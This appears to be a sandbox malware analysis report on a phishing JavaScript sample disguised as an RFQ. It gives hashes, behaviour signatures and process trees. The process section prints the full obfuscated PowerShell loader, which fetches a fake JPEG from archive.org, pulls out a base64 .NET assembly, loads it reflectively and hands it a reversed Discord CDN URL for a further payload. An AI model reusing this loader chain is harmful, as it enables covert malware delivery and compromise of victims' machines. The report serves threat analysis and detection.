Analysis
max time kernel: 11s
max time network: 16s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 29/08/2024, 05:55

Static task: static1

Behavioral task: behavioral1
Sample: RFQ-MR-24-09101 SPS.js
Resource: win7-20240704-en

Behavioral task: behavioral2
Sample: RFQ-MR-24-09101 SPS.js
Resource: win10v2004-20240802-en
General
Target: RFQ-MR-24-09101 SPS.js
Size: 615KB
MD5: 816e7f77445ae08cda5ad3346fa8c8ff
SHA1: ecb2b271b0b22b962ce264552bc5453eff755d97
SHA256: 7db5b864d7dc11b7523b182bafd5c9526343bfd9d2443fb0700588754c4cd551
SHA512: 1924fb265dd4e5e00b9293fce18fe831e2e8e6c5437873b0c6e2b6563204540595d0bea7f74d868a39e1727d77b483b434b48e0f2fcac02c8eeef989110f3423
SSDEEP: 12288:RvqUGASKJa54+3wlF6vRXUlOe8QkqRH9Dx5Ofk1oeQcaSc8+L2g7UH1sEP0ZNnlX:ZFh4ILqSFq
Malware Config
Extracted
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  5     2772  powershell.exe
  6     2772  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Run Powershell and hide display window.
  pid   Process
  2716  powershell.exe
  2772  powershell.exe

Command and Scripting Interpreter: JavaScript (1 TTPs)

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2716  powershell.exe
  2772  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2716  powershell.exe
  Token: SeDebugPrivilege  2772  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   Process         procid_target
  PID 2240 wrote to memory of 2716  2240  wscript.exe     29
  PID 2240 wrote to memory of 2716  2240  wscript.exe     29
  PID 2240 wrote to memory of 2716  2240  wscript.exe     29
  PID 2716 wrote to memory of 2772  2716  powershell.exe  31
  PID 2716 wrote to memory of 2772  2716  powershell.exe  31
  PID 2716 wrote to memory of 2772  2716  powershell.exe  31
Processes

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ-MR-24-09101 SPS.js"
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 string omitted]';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⼞ ⋄ ⍃ ⨞ ❄','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&91bcfd804a2673dfb54374d1c1b4c541cc5117ac50a4f497b66433fc4b66e6e5=mh&c14cec66=si&c9510d66=xe?txt.JJ/1319851109630428721/9941734063661597721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'terrestre','InstallUtil','desativado'))"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 7836499241e402974ba30b17edd8a18e
SHA1: 310e199eadc99e8b6f26f35cd6b43ee3b2b81b33
SHA256: 4bcddd41deb6911c2942515b415445283982c802e62d7e415d6feee137dcd23e
SHA512: 870e3d8303a4178aa4898b6333c697d426f7798c01701de0550fe347b4a3c909e5ae6f53886ebb653fb6b6923ec3b7f15fb0e6e0d64ac45bb22fac6d9fd1e25c